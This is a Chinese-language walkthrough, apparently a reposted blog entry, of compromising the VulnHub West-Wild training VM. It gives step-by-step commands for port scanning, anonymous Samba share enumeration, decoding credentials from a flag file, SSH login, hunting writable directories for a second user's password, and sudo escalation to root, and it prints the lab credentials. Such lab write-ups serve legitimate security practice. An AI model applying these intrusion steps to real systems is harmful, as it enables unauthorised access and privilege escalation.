vulnhub之West-Wild的实践

admin 2024年6月17日11:49:58评论1 views字数 762阅读2分32秒阅读模式

本周实践的是vulnhub的West-Wild镜像,

下载地址,https://download.vulnhub.com/westwild/West-Wild-v1.1.ova,

用virtualbox导入成功,

不用做地址扫描,console上直接看到了dhcp到的地址192.168.0.187,

vulnhub之West-Wild的实践

做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

发现靶机有ssh、http以及samba服务,

vulnhub之West-Wild的实践

查看samba共享,smbclient -L \\192.168.0.187,

获取到wave,

vulnhub之West-Wild的实践

继续访问wave,smbclient \\192.168.0.187/wave,

查看到文件,下载FLAG1.txt,获取到base64编码内容,

解码,echo 'RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K' | base64 -d,

获取到用户名密码,wavex/door+open,

vulnhub之West-Wild的实践

登录靶机,ssh [email protected]

查找root权限可写路径,find / -writable -type d 2>/dev/null,

获取到/usr/share/av/westsidesecret,

进入目录,cd /usr/share/av/westsidesecret,

查看到ififoregt.sh,内容是bash脚本,

里面有另一个用户名密码,aveng/kaizen+80,

vulnhub之West-Wild的实践

切换账户,su aveng,sudo -l确认有完全的sudo权限,

切到root,sudo su root,id确认没问题,

vulnhub之West-Wild的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之West-Wild的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月17日11:49:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之West-Wild的实践https://cn-sec.com/archives/2854687.html

发表评论

匿名网友 填写信息